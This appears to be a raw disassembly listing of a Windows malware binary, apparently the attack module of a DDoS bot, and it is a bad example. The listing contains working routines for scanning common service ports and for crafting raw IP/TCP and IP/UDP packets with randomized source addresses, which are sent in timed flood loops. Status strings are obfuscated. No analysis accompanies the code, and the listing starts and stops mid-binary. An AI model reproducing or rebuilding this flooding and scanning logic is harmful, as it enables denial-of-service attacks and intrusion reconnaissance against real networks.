mov edi, offset aLcgg60qk2mf0 ; "Lcgg60QK2mf0"
mov esi, offset aSSPortsHitS ; "%s %s, ports hit: (%s)"
jnz short loc_42845A
cmp [ebp+var_C], ecx
jnz short loc_42845F
push [ebp+var_14]
lea edx, [ebp+var_120]
push [ebp+var_18]
push edx
push ecx
push ecx
lea ecx, [ebp+var_A0]
push ecx
push eax
call sub_428597
push eax
push ebx
push edi
lea eax, [ebp+var_A0]
push esi
push eax
push [ebp+arg_0]
call sub_41CD84
add esp, 34h
xor ecx, ecx
loc_42845A: ; CODE XREF: sub_4283DC+43�j
cmp [ebp+var_C], ecx
jz short loc_42849A
loc_42845F: ; CODE XREF: sub_4283DC+48�j
push [ebp+var_14]
lea eax, [ebp+var_120]
push [ebp+var_18]
push eax
lea eax, [ebp+var_A0]
push [ebp+var_C]
push [ebp+var_8]
push eax
push [ebp+var_124]
call sub_428597
push eax
push ebx
push edi
lea eax, [ebp+var_A0]
push esi
push eax
push [ebp+arg_0]
call sub_41CD0E
add esp, 34h
loc_42849A: ; CODE XREF: sub_4283DC+81�j
push [ebp+var_20]
call sub_42355A
pop ecx
push 0
call dword_437170 ; ExitThread
pop edi
pop esi
pop ebx
sub_4283DC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4284AE proc near ; CODE XREF: sub_428597+116�p
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
and [ebp+var_4], 0
cmp [ebp+arg_C], 0
push esi
push edi
jnz short loc_4284D7
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4372C8 ; connect
jmp loc_428593
; ---------------------------------------------------------------------------
loc_4284D7: ; CODE XREF: sub_4284AE+13�j
mov esi, [ebp+arg_0]
lea eax, [ebp+var_8]
xor edi, edi
push eax
inc edi
push 8004667Eh
push esi
mov [ebp+var_8], edi
call dword_43728C ; ioctlsocket
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call dword_456E9C ; connect
push [ebp+arg_C]
lea eax, [ebp+var_210]
mov [ebp+var_108], esi
mov [ebp+var_10C], edi
push 0
push eax
lea eax, [ebp+var_10C]
mov [ebp+var_20C], esi
push eax
lea eax, [esi+1]
push eax
mov [ebp+var_210], edi
call dword_456EFC ; select
test eax, eax
jnz short loc_42853B
or eax, 0FFFFFFFFh
jmp short loc_428593
; ---------------------------------------------------------------------------
loc_42853B: ; CODE XREF: sub_4284AE+86�j
or edi, 0FFFFFFFFh
cmp eax, edi
jnz short loc_428546
loc_428542: ; CODE XREF: sub_4284AE+B8�j
; sub_4284AE+DC�j
mov eax, edi
jmp short loc_428593
; ---------------------------------------------------------------------------
loc_428546: ; CODE XREF: sub_4284AE+92�j
lea eax, [ebp+var_10C]
push eax
push esi
call sub_428FF4 ; __WSAFDIsSet
test eax, eax
jnz short loc_428568
lea eax, [ebp+var_210]
push eax
push esi
call sub_428FF4 ; __WSAFDIsSet
test eax, eax
jz short loc_428542
loc_428568: ; CODE XREF: sub_4284AE+A7�j
lea eax, [ebp+arg_0]
mov [ebp+arg_0], 4
push eax
lea eax, [ebp+var_4]
push eax
push 1007h
push 0FFFFh
push esi
call dword_4372E4 ; getsockopt
cmp eax, edi
jz short loc_428542
mov eax, [ebp+var_4]
neg eax
sbb eax, eax
loc_428593: ; CODE XREF: sub_4284AE+24�j
; sub_4284AE+8B�j ...
pop edi
pop esi
leave
retn
sub_4284AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428597 proc near ; CODE XREF: sub_4283DC+61�p
; sub_4283DC+A3�p
var_AC = dword ptr -0ACh
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = byte ptr -90h
var_64 = word ptr -64h
var_62 = word ptr -62h
var_60 = dword ptr -60h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 9Ch
push ebx
xor ebx, ebx
push esi
inc ebx
push edi
xor esi, esi
push ebx
push esi
push esi
push 0FFh
push 3
push 2
mov [ebp+var_14], ebx
call dword_4372C4 ; WSASocketA
lea eax, [ebp+var_14]
push 4
push eax
push 2
push esi
push esi
mov dword_6764D8, esi
call dword_437288 ; setsockopt
call dword_437184 ; GetTickCount
push eax
call sub_429ABF
pop ecx
xor eax, eax
lea edi, [ebp+var_20]
mov [ebp+var_54], ebx
mov [ebp+var_50], 15h
mov [ebp+var_4C], 16h
mov [ebp+var_48], 17h
mov [ebp+var_44], 35h
mov [ebp+var_40], 50h
mov [ebp+var_3C], 71h
mov [ebp+var_38], 87h
mov [ebp+var_34], 8Bh
mov [ebp+var_30], 1BDh
mov [ebp+var_2C], 0CEAh
mov [ebp+var_28], 0D3Dh
mov [ebp+var_24], 1A0Bh
stosd
push 0Bh
lea edi, [ebp+var_90]
pop ecx
mov [ebp+var_9C], esi
mov [ebp+var_98], esi
mov [ebp+var_94], esi
rep stosd
mov [ebp+var_C], esi
mov [ebp+var_1C], 3
mov [ebp+var_18], 0BB8h
mov [ebp+var_4], esi
loc_42866E: ; CODE XREF: sub_428597+143�j
push [ebp+arg_10]
mov [ebp+var_64], 2
call sub_41E326
mov [ebp+var_60], eax
mov eax, [ebp+var_4]
pop ecx
lea edi, [ebp+eax+var_54]
mov ax, [edi]
push eax
call dword_456F18 ; ntohs
push esi
push ebx
push 2
mov [ebp+var_62], ax
call dword_456FB0 ; socket
lea ecx, [ebp+var_1C]
mov [ebp+var_8], eax
push ecx
lea ecx, [ebp+var_64]
push 10h
push ecx
push eax
call sub_4284AE
add esp, 10h
mov [ebp+var_10], eax
push [ebp+var_8]
call dword_456FD0 ; closesocket
cmp [ebp+var_10], esi
jnz short loc_4286D2
mov ecx, [ebp+var_4]
mov eax, [edi]
mov [ebp+ecx+var_9C], eax
loc_4286D2: ; CODE XREF: sub_428597+12D�j
add [ebp+var_4], 4
cmp [ebp+var_4], 38h
jl short loc_42866E
mov edi, 400h
push offset asc_43D938 ; " "
push edi
push offset dword_6764E0
call sub_429AEE
add esp, 0Ch
call dword_437184 ; GetTickCount
mov [ebp+var_8], eax
mov [ebp+var_4], esi
mov ebx, 0FFFFh
loc_428705: ; CODE XREF: sub_428597+1CB�j
call dword_437184 ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+arg_14]
ja short loc_428764
mov eax, [ebp+var_4]
mov eax, [ebp+eax*4+var_9C]
cmp eax, esi
jz short loc_428745
mov [ebp+var_C], eax
push eax
mov eax, offset dword_6764E0
push eax
push offset aSD ; "%s%d "
push edi
push eax
call sub_429AEE
add esp, 14h
jmp short loc_42875B
; ---------------------------------------------------------------------------
loc_428745: ; CODE XREF: sub_428597+191�j
push ebx
push esi
call sub_41E34F
pop ecx
pop ecx
push eax
call dword_456F18 ; ntohs
movzx eax, ax
mov [ebp+var_C], eax
loc_42875B: ; CODE XREF: sub_428597+1AC�j
inc [ebp+var_4]
cmp [ebp+var_4], 0Eh
jl short loc_428705
loc_428764: ; CODE XREF: sub_428597+183�j
; sub_428597+409�j
push 28h
push esi
push offset byte_67647C
call sub_429690
push ebx
push edi
mov byte_67647C, 45h
mov byte_676485, 6
mov byte_67647D, 8
call sub_41E34F
add esp, 14h
push eax
call dword_456F18 ; ntohs
push 28h
mov word_676480, ax
call dword_456F18 ; ntohs
push [ebp+arg_10]
mov word_67647E, ax
mov word_676482, si
mov byte_676484, 40h
call sub_41E326
mov edi, eax
mov [esp+0ACh+var_AC], 0FFFEh
push 1
and edi, ebx
call sub_41E34F
push [ebp+arg_10]
shl eax, 20h
or eax, edi
mov dword_676488, eax
call sub_41E326
and byte_67649D, 0
add esp, 0Ch
mov dword_67648C, eax
push 2000h
call dword_456F18 ; ntohs
push ebx
push esi
mov word_67649E, ax
call sub_41E34F
mov edi, eax
push ebx
push esi
shl edi, 8
call sub_41E34F
add esp, 10h
add edi, eax
push edi
call dword_456F14 ; ntohl
mov dword_676494, eax
mov al, byte_67649C
push [ebp+arg_10]
and al, 0Fh
or al, 50h
mov dword_676498, esi
mov byte_67649C, al
mov ax, word ptr [ebp+var_C]
mov word_6764A2, si
mov word_676492, ax
call sub_41E326
and byte_6764BC, 0
pop ecx
push 14h
mov dword_6764B8, eax
mov byte_6764BD, 6
call dword_456F18 ; ntohs
push [ebp+arg_10]
mov word_6764BE, ax
mov word_6764A4, 2
call sub_41E326
mov dword_6764A8, eax
mov ax, word_676492
pop ecx
mov word_6764A6, ax
mov [ebp+var_4], esi
jmp short loc_4288A2
; ---------------------------------------------------------------------------
loc_4288A0: ; CODE XREF: sub_428597+3DC�j
xor esi, esi
loc_4288A2: ; CODE XREF: sub_428597+307�j
cmp [ebp+var_4], esi
push ebx
push esi
jnz short loc_4288D6
call sub_41E34F
pop ecx
pop ecx
push eax
call dword_456F18 ; ntohs
mov word_676490, ax
mov eax, dword_676488
mov dword_6764B4, eax
mov byte_67649D, 2
mov dword_676498, esi
jmp short loc_4288F3
; ---------------------------------------------------------------------------
loc_4288D6: ; CODE XREF: sub_428597+310�j
mov byte_67649D, 10h
call sub_41E34F
pop ecx
pop ecx
push eax
call dword_456F18 ; ntohs
movzx eax, ax
mov dword_676498, eax
loc_4288F3: ; CODE XREF: sub_428597+33D�j
inc word_676480
inc dword_676494
mov ax, word_676492
push 5
mov word_676486, si
mov word_6764A0, si
pop ecx
mov esi, offset word_676490
mov edi, offset dword_6764C0
push 14h
rep movsd
mov esi, offset byte_67647C
mov word_6764A6, ax
push esi
call sub_41E322
push 20h
push offset dword_6764B4
mov word_676486, ax
call sub_41E322
add esp, 10h
mov word_6764A0, ax
push 10h
push offset word_6764A4
push 0
push 28h
push esi
push dword_6764D8
call dword_456F8C ; sendto
inc [ebp+var_4]
cmp [ebp+var_4], 3FFh
jl loc_4288A0
call dword_437184 ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+arg_14]
ja short loc_4289A5
push [ebp+arg_18]
call dword_43718C ; Sleep
xor esi, esi
mov edi, 400h
jmp loc_428764
; ---------------------------------------------------------------------------
loc_4289A5: ; CODE XREF: sub_428597+3F7�j
pop edi
pop esi
mov eax, offset dword_6764E0
pop ebx
leave
retn
sub_428597 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4289AF proc near ; DATA XREF: sub_40A938+7C54�o
var_22C = byte ptr -22Ch
var_128 = dword ptr -128h
var_124 = byte ptr -124h
var_A4 = byte ptr -0A4h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 22Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 47h
mov esi, eax
pop ecx
lea edi, [ebp+var_128]
rep movsd
mov ecx, [ebp+var_128]
mov esi, offset dword_457CD8
push 100h
push esi
mov [ebp+var_4], ecx
mov dword ptr [eax+118h], 1
call dword_4372DC ; gethostname
push esi
call dword_4372A0 ; gethostbyname
mov eax, [eax+0Ch]
push esi
mov esi, dword_4372BC
mov eax, [eax]
mov edi, [eax]
call esi ; dword_4372BC
lea eax, [ebp+var_124]
push eax
call esi ; dword_4372BC
mov ebx, [ebp+var_20]
mov esi, [ebp+var_1C]
push 0
mov [ebp+var_8], eax
call sub_42A705
push eax
call sub_429ABF
pop ecx
test esi, esi
pop ecx
jle loc_428AC9
mov [ebp+var_C], esi
loc_428A32: ; CODE XREF: sub_4289AF+114�j
call sub_429ACC
cdq
mov ecx, 0FFh
and edi, 0FFFFFFh
idiv ecx
shl edx, 18h
or edi, edx
call sub_429ACC
and [ebp+arg_0], 0
mov esi, eax
and esi, 0FFh
inc esi
test esi, esi
jle short loc_428A77
loc_428A60: ; CODE XREF: sub_4289AF+C6�j
call sub_429ACC
mov ecx, [ebp+arg_0]
inc [ebp+arg_0]
cmp [ebp+arg_0], esi
mov [ebp+ecx+var_22C], al
jl short loc_428A60
loc_428A77: ; CODE XREF: sub_4289AF+AF�j
call sub_429ACC
and eax, 3
jl short loc_428AC0
cmp eax, 1
jle short loc_428AA5
cmp eax, 2
jnz short loc_428AC0
push ebx
push [ebp+var_8]
call sub_429ACC
push eax
push edi
lea eax, [ebp+var_22C]
push esi
push eax
call sub_428D2F
jmp short loc_428ABD
; ---------------------------------------------------------------------------
loc_428AA5: ; CODE XREF: sub_4289AF+D5�j
push ebx
push [ebp+var_8]
call sub_429ACC
push eax
push edi
lea eax, [ebp+var_22C]
push esi
push eax
call sub_428B36
loc_428ABD: ; CODE XREF: sub_4289AF+F4�j
add esp, 18h
loc_428AC0: ; CODE XREF: sub_4289AF+D0�j
; sub_4289AF+DA�j
dec [ebp+var_C]
jnz loc_428A32
loc_428AC9: ; CODE XREF: sub_4289AF+7A�j
cmp [ebp+var_14], 0
mov ebx, offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
mov edi, offset aVfeso_qcgdt_ ; "vfEsO.QcgDt."
mov esi, offset aSSS_0 ; "%s %s (%s)"
jnz short loc_428B00
cmp [ebp+var_18], 0
jnz short loc_428B06
lea eax, [ebp+var_124]
push eax
push ebx
push edi
lea eax, [ebp+var_A4]
push esi
push eax
push [ebp+var_4]
call sub_41CD84
add esp, 18h
loc_428B00: ; CODE XREF: sub_4289AF+12D�j
cmp [ebp+var_18], 0
jz short loc_428B22
loc_428B06: ; CODE XREF: sub_4289AF+133�j
lea eax, [ebp+var_124]
push eax
push ebx
push edi
lea eax, [ebp+var_A4]
push esi
push eax
push [ebp+var_4]
call sub_41CD0E
add esp, 18h
loc_428B22: ; CODE XREF: sub_4289AF+155�j
push [ebp+var_24]
call sub_42355A
pop ecx
push 0
call dword_437170 ; ExitThread
pop edi
pop esi
pop ebx
sub_4289AF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428B36 proc near ; CODE XREF: sub_4289AF+109�p
var_1038 = byte ptr -1038h
var_1034 = byte ptr -1034h
var_102F = byte ptr -102Fh
var_102E = byte ptr -102Eh
var_102C = byte ptr -102Ch
var_1024 = byte ptr -1024h
var_101C = byte ptr -101Ch
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = dword ptr -34h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
var_1E = word ptr -1Eh
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov eax, 1038h
call sub_429A90
push ebx
xor ebx, ebx
push ebx
push ebx
push ebx
push 11h
push 3
push 2
call dword_4372C4 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jz short loc_428B79
lea ecx, [ebp+var_24]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_24], 1
call dword_437288 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_428B80
loc_428B79: ; CODE XREF: sub_428B36+25�j
xor eax, eax
jmp loc_428D2C
; ---------------------------------------------------------------------------
loc_428B80: ; CODE XREF: sub_428B36+41�j
push esi
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_20], 45h
lea esi, [edi+1Ch]
mov [ebp+var_28], esi
call sub_429ACC
push esi
mov esi, dword_4372C0
mov [ebp+var_1F], al
call esi ; dword_4372C0
mov [ebp+var_1E], ax
call sub_429ACC
push eax
call esi ; dword_4372C0
mov [ebp+var_1C], ax
call sub_429ACC
push [ebp+arg_C]
mov [ebp+var_1A], ax
mov eax, [ebp+arg_8]
mov [ebp+var_18], 80h
mov [ebp+var_14], eax
mov eax, [ebp+arg_10]
mov [ebp+var_17], 11h
mov [ebp+var_16], bx
mov [ebp+var_10], eax
call esi ; dword_4372C0
push [ebp+arg_14]
mov [ebp+var_8], ax
call esi ; dword_4372C0
add edi, 8
mov [ebp+var_6], ax
push edi
call esi ; dword_4372C0
mov edi, 200h
mov [ebp+var_4], ax
push edi
lea eax, [ebp+var_1038]
push ebx
push eax
mov [ebp+var_2], bx
call sub_429690
lea eax, [ebp+var_14]
push 4
push eax
lea eax, [ebp+var_1038]
push eax
call sub_429350
lea eax, [ebp+var_10]
push 4
push eax
lea eax, [ebp+var_1034]
push eax
call sub_429350
lea eax, [ebp+var_17]
push 1
push eax
lea eax, [ebp+var_102F]
push eax
call sub_429350
lea eax, [ebp+var_4]
push 2
push eax
lea eax, [ebp+var_102E]
push eax
call sub_429350
lea eax, [ebp+var_8]
push 8
push eax
lea eax, [ebp+var_102C]
push eax
call sub_429350
movzx esi, word ptr [ebp+arg_4]
add esp, 48h
lea eax, [ebp+var_1024]
push esi
push [ebp+arg_0]
push eax
call sub_429350
lea eax, [esi+14h]
push eax
lea eax, [ebp+var_1038]
push eax
call sub_428F86
mov [ebp+var_2], ax
push edi
lea eax, [ebp+var_1038]
push ebx
push eax
call sub_429690
lea eax, [ebp+var_20]
push 14h
push eax
lea eax, [ebp+var_1038]
push eax
call sub_429350
lea eax, [ebp+var_8]
push 8
push eax
lea eax, [ebp+var_1024]
push eax
call sub_429350
push esi
lea eax, [ebp+var_101C]
push [ebp+arg_0]
push eax
call sub_429350
add esp, 44h
lea eax, [ebp+var_38]
push 10h
push ebx
push eax
call sub_429690
mov ax, [ebp+var_6]
add esp, 0Ch
mov [ebp+var_36], ax
mov eax, [ebp+var_10]
mov [ebp+var_34], eax
lea eax, [ebp+var_38]
push 10h
push eax
movzx eax, word ptr [ebp+var_28]
push ebx
push eax
lea eax, [ebp+var_1038]
mov [ebp+var_38], 2
push eax
push [ebp+var_C]
call dword_437290 ; sendto
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
push 2
mov esi, ecx
call dword_43718C ; Sleep
push [ebp+var_C]
call dword_4372D4 ; closesocket
mov eax, esi
pop edi
pop esi
loc_428D2C: ; CODE XREF: sub_428B36+45�j
pop ebx
leave
retn
sub_428B36 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428D2F proc near ; CODE XREF: sub_4289AF+EF�p
var_1044 = byte ptr -1044h
var_1040 = byte ptr -1040h
var_103B = byte ptr -103Bh
var_103A = byte ptr -103Ah
var_1038 = byte ptr -1038h
var_1030 = byte ptr -1030h
var_1024 = byte ptr -1024h
var_101C = byte ptr -101Ch
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
var_1E = word ptr -1Eh
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = word ptr -0Ah
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov eax, 1044h
call sub_429A90
push edi
xor edi, edi
push edi
push edi
push edi
push 0FFh
push 3
push 2
call dword_4372C4 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_18], eax
jz short loc_428D75
lea ecx, [ebp+var_34]
push 4
push ecx
push 2
push edi
push eax
mov [ebp+var_34], 1
call dword_437288 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_428D7C
loc_428D75: ; CODE XREF: sub_428D2F+28�j
xor eax, eax
jmp loc_428F83
; ---------------------------------------------------------------------------
loc_428D7C: ; CODE XREF: sub_428D2F+44�j
mov eax, [ebp+arg_4]
push ebx
push esi
mov [ebp+var_14], 45h
lea esi, [eax+28h]
mov [ebp+var_30], esi
call sub_429ACC
push esi
mov esi, dword_4372C0
mov [ebp+var_13], al
call esi ; dword_4372C0
mov [ebp+var_12], ax
call sub_429ACC
push eax
call esi ; dword_4372C0
mov [ebp+var_10], ax
call sub_429ACC
push [ebp+arg_C]
mov [ebp+var_E], ax
mov eax, [ebp+arg_8]
mov [ebp+var_C], 80h
mov [ebp+var_8], eax
mov eax, [ebp+arg_10]
mov [ebp+var_B], 6
mov [ebp+var_A], di
mov [ebp+var_4], eax
call esi ; dword_4372C0
push [ebp+arg_14]
mov [ebp+var_2C], ax
call esi ; dword_4372C0
mov [ebp+var_2A], ax
call sub_429ACC
mov ebx, dword_4372E0
push eax
call ebx ; dword_4372E0
mov [ebp+var_24], eax
mov eax, [ebp+arg_4]
add eax, 14h
push eax
call esi ; dword_4372C0
mov [ebp+var_20], al
call sub_429ACC
mov [ebp+var_1F], al
call sub_429ACC
push eax
call ebx ; dword_4372E0
push 1A0Ah
mov [ebp+var_28], eax
mov [ebp+var_1A], di
call esi ; dword_4372C0
mov ebx, 200h
mov [ebp+var_1E], ax
push ebx
lea eax, [ebp+var_1044]
push edi
push eax
mov [ebp+var_1C], di
call sub_429690
lea eax, [ebp+var_8]
push 4
push eax
lea eax, [ebp+var_1044]
push eax
call sub_429350
lea eax, [ebp+var_4]
push 4
push eax
lea eax, [ebp+var_1040]
push eax
call sub_429350
lea eax, [ebp+var_B]
push 1
push eax
lea eax, [ebp+var_103B]
push eax
call sub_429350
lea eax, [ebp+var_20]
push 2
push eax
lea eax, [ebp+var_103A]
push eax
call sub_429350
lea eax, [ebp+var_2C]
push 14h
push eax
lea eax, [ebp+var_1038]
push eax
call sub_429350
movzx esi, word ptr [ebp+arg_4]
add esp, 48h
lea eax, [ebp+var_1024]
push esi
push [ebp+arg_0]
push eax
call sub_429350
lea eax, [esi+20h]
push eax
lea eax, [ebp+var_1044]
push eax
call sub_428F86
mov [ebp+var_1C], ax
push ebx
lea eax, [ebp+var_1044]
push edi
push eax
call sub_429690
lea eax, [ebp+var_14]
push 14h
push eax
lea eax, [ebp+var_1044]
push eax
call sub_429350
lea eax, [ebp+var_2C]
push 14h
push eax
lea eax, [ebp+var_1030]
push eax
call sub_429350
push esi
lea eax, [ebp+var_101C]
push [ebp+arg_0]
push eax
call sub_429350
add esp, 44h
add esi, 34h
lea eax, [ebp+var_1044]
push esi
push eax
call sub_428F86
mov [ebp+var_A], ax
lea eax, [ebp+var_14]
push 14h
push eax
lea eax, [ebp+var_1044]
push eax
call sub_429350
push 10h
lea eax, [ebp+var_44]
push edi
push eax
call sub_429690
mov ax, [ebp+var_2A]
add esp, 20h
mov [ebp+var_42], ax
mov eax, [ebp+var_4]
mov [ebp+var_40], eax
lea eax, [ebp+var_44]
push 10h
push eax
movzx eax, word ptr [ebp+var_30]
push edi
push eax
lea eax, [ebp+var_1044]
mov [ebp+var_44], 2
push eax
push [ebp+var_18]
call dword_437290 ; sendto
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov esi, ecx
push 2
call dword_43718C ; Sleep
push [ebp+var_18]
call dword_4372D4 ; closesocket
mov eax, esi
pop esi
pop ebx
loc_428F83: ; CODE XREF: sub_428D2F+48�j
pop edi
leave
retn
sub_428D2F endp
; =============== S U B R O U T I N E =======================================
sub_428F86 proc near ; CODE XREF: sub_428B36+14A�p
; sub_428D2F+182�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
xor edx, edx
cmp ecx, 1
push esi
jle short loc_428FB1
lea eax, [ecx-2]
push edi
shr eax, 1
inc eax
mov esi, eax
neg esi
lea ecx, [ecx+esi*2]
mov esi, [esp+8+arg_0]
loc_428FA4: ; CODE XREF: sub_428F86+26�j
movzx edi, word ptr [esi]
add edx, edi
inc esi
inc esi
dec eax
jnz short loc_428FA4
pop edi
jmp short loc_428FB5
; ---------------------------------------------------------------------------
loc_428FB1: ; CODE XREF: sub_428F86+A�j
mov esi, [esp+4+arg_0]
loc_428FB5: ; CODE XREF: sub_428F86+29�j
test ecx, ecx
jz short loc_428FBE
movzx eax, byte ptr [esi]
add edx, eax
loc_428FBE: ; CODE XREF: sub_428F86+31�j
mov ecx, edx
and edx, 0FFFFh
shr ecx, 20h
add ecx, edx
pop esi
mov eax, ecx
shr eax, 20h
add eax, ecx
not eax
retn
sub_428F86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_428FD6 proc near ; CODE XREF: sub_41EF29+E7�p
jmp dword_437108
sub_428FD6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_428FDC proc near ; CODE XREF: sub_41EF29+3F�p
jmp dword_437110
sub_428FDC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_428FE2 proc near ; CODE XREF: sub_41EF29+26�p
; sub_41F02F+6D�p
jmp dword_437114
sub_428FE2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_428FE8 proc near ; CODE XREF: sub_41F02F+3A0�p
jmp dword_437118
sub_428FE8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_428FEE proc near ; CODE XREF: sub_41F02F+8B�p
jmp dword_43711C
sub_428FEE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_428FF4 proc near ; CODE XREF: sub_4284AE+A0�p
; sub_4284AE+B1�p
jmp dword_4372E8
sub_428FF4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_428FFA proc near ; CODE XREF: sub_405C6A+83�p
; sub_405C6A+121�p ...
jmp dword_437248
sub_428FFA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_429000 proc near ; CODE XREF: sub_41F02F+D2�p
jmp dword_4372F4
sub_429000 endp
; =============== S U B R O U T I N E =======================================
sub_429006 proc near ; CODE XREF: sub_41553D+33�p
; sub_41557B+33�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_429822
pop ecx
retn
sub_429006 endp
; =============== S U B R O U T I N E =======================================
sub_429011 proc near ; CODE XREF: sub_41B4FB+D�p
mov eax, offset loc_4365C4
call sub_42B6FC
sub esp, 30h
mov al, [ebp-0Dh]
push esi
push 0
lea ecx, [ebp-20h]
mov [ebp-20h], al
call sub_41B427
mov esi, offset aStringTooLong ; "string too long"
push esi
call sub_4292D0
pop ecx
push eax
push esi
lea ecx, [ebp-20h]
loc_429040: ; DATA XREF: .text:0043A055�o
call sub_41B45F
and dword ptr [ebp-4], 0
lea eax, [ebp-20h]
push eax
lea ecx, [ebp-3Ch]
call sub_41B189
lea eax, [ebp-3Ch]
push offset dword_438638
push eax
mov dword ptr [ebp-3Ch], offset off_4373A4
call sub_42B82A
pop esi
sub_429011 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42906B proc near ; CODE XREF: sub_4290A8+20�p
; DATA XREF: .text:0043863C�o
mov eax, offset loc_4365D8
call sub_42B6FC
push ecx
push esi
mov esi, ecx
mov [ebp-10h], esi
mov dword ptr [esi], offset off_4373C4
and dword ptr [ebp-4], 0
push 1
lea ecx, [esi+0Ch]
call sub_41B427
or dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, esi
call sub_42B94B
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
leave
retn
sub_42906B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4290A8 proc near ; DATA XREF: .text:004373AC�o
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_4290E1
lea eax, [ebp+var_1C]
push offset dword_438638
push eax
call sub_42B82A
loc_4290C5: ; DATA XREF: .text:off_4373A4�o
push esi
mov esi, ecx
call sub_42906B
test [esp+20h+var_18], 1
jz short loc_4290DB
push esi
call sub_429006
pop ecx
loc_4290DB: ; CODE XREF: sub_4290A8+2A�j
mov eax, esi
pop esi
retn 4
sub_4290A8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4290E1 proc near ; CODE XREF: sub_4290A8+A�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
call sub_41B26C
mov dword ptr [esi], offset off_4373A4
mov eax, esi
pop esi
retn 4
sub_4290E1 endp
; =============== S U B R O U T I N E =======================================
